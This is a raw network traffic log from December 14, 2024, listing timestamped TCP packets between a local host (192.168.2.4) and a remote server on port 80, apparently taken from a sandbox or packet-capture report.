Dec 14, 2024 12:56:32.495392084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.495536089 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.495543003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.495621920 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.497118950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.497179031 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.497272968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.497325897 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.498826981 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.498884916 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.498959064 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.499068975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.500545025 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.500636101 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.500690937 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.500799894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.502290964 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.502353907 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.502439976 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.502494097 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.504056931 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.504126072 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.504196882 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.504260063 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.505717039 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.505780935 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.505841970 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.505901098 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.507432938 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.507494926 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.507534027 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.507591009 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.509140968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.509202957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.509274006 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.509334087 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.510845900 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.510902882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.510940075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.511001110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.512552023 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.512659073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.512713909 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.514311075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.514370918 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.514372110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.514435053 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.515995026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.516057014 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.516115904 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.516204119 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.517709970 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.517776012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.517849922 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.517910957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.519423008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.519524097 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.521117926 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.521265984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.522845984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.523050070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.523966074 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.524544001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.524684906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.526112080 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.526268959 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.526392937 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.526506901 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.528002977 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.528069019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.528825998 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.529691935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.529818058 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.529825926 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.529906034 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.531423092 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.531483889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.531523943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.531574965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.533176899 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.533319950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.533443928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.534832001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.534969091 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.536560059 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.536648035 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.538000107 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.538605928 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.538727999 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.539558887 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.540137053 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.540205002 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.541712999 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.541850090 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.543405056 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.543560982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.545140028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.545259953 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.545784950 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.545929909 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.546904087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.547024965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.547849894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.549026012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.549079895 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.550249100 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.550379038 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.551994085 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.552100897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.552666903 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.553694010 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.553818941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.554393053 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.555422068 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.555551052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.557265997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.557450056 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.558892965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.559073925 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.559380054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.560599089 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.560683012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.562491894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.562545061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.564060926 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.570839882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.609703064 CET	80	49837	34.107.221.82	192.168.2.4
Dec 14, 2024 12:56:32.670665979 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.670701981 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.670727015 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.670774937 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.671454906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.671511889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.671576023 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.671631098 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.673012972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.673070908 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.673144102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.673193932 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.674530029 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.674592972 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.674763918 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.674823046 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.676109076 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.676163912 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.676238060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.676295042 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.677683115 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.677743912 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.677817106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.677871943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.679150105 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.679203033 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.679274082 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.679353952 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.680609941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.680677891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.680744886 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.680826902 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.682132959 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.682187080 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.682193995 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.682244062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.683566093 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.683628082 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.683701992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.683754921 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.684997082 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.685050011 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.685055971 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.685112953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.686439037 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.686497927 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.686587095 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.686647892 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.687897921 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.687957048 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.687995911 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.688049078 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.689291000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.689347029 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.689390898 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.689441919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.690707922 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.690762997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.690768003 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.690817118 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.692250967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.692308903 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.692399025 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.692451000 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.693537951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.693602085 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.693662882 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.693715096 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.694964886 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.695028067 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.695067883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.695122957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.696392059 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.696449041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.696536064 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.696593046 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.697765112 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.697840929 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.697978020 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.698028088 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.699176073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.699244022 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.699331045 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.699417114 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.700548887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.700612068 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.700681925 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.700737953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.701936007 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.701992989 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.702050924 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.702105999 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.703351021 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.703429937 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.703515053 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.703562021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.704747915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.704813004 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.704946995 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.704999924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.706146955 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.706206083 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.706278086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.706332922 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.707559109 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.707623959 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.707736015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.707782984 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.708915949 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.708973885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.709048033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.709096909 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.710361958 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.710421085 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.710474014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.710527897 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.711920977 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.711975098 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.711987019 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.712018967 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.713097095 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.713152885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.713217974 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.713270903 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.714596987 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.714632034 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.714652061 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.714679003 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.715890884 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.715945005 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.716017008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.716067076 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.717338085 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.717391014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.717400074 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.717442036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.718682051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.718733072 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.718734980 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.718780994 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.720082998 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.720139027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.720218897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.720268965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.721474886 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.721529961 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.721611977 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.721664906 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.722951889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.723005056 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.723027945 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.723088980 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.724600077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.724636078 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.724658012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.724688053 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.725708008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.725743055 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.725764036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.725794077 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.727051973 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.727108002 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.727166891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.727219105 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.728610992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.728665113 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.728673935 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.728717089 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.729847908 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.729933023 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.729975939 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.730026960 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.731244087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.731306076 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.731344938 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.731390953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.732629061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.732697010 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.732769012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.732819080 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.734033108 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.734088898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.734148026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.734196901 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.735424042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.735481024 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.735511065 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.735562086 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.736848116 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.736902952 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.736994028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.737051010 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.738311052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.738367081 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.738384962 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.738440990 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.739622116 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.739676952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.739677906 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.739726067 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.741076946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.741147041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.741292000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.741344929 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.742470026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.742517948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.742604971 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.742655993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.743813992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.743868113 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.743938923 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.743990898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.745155096 CET	80	49827	185.215.113.16	192.168.2.4
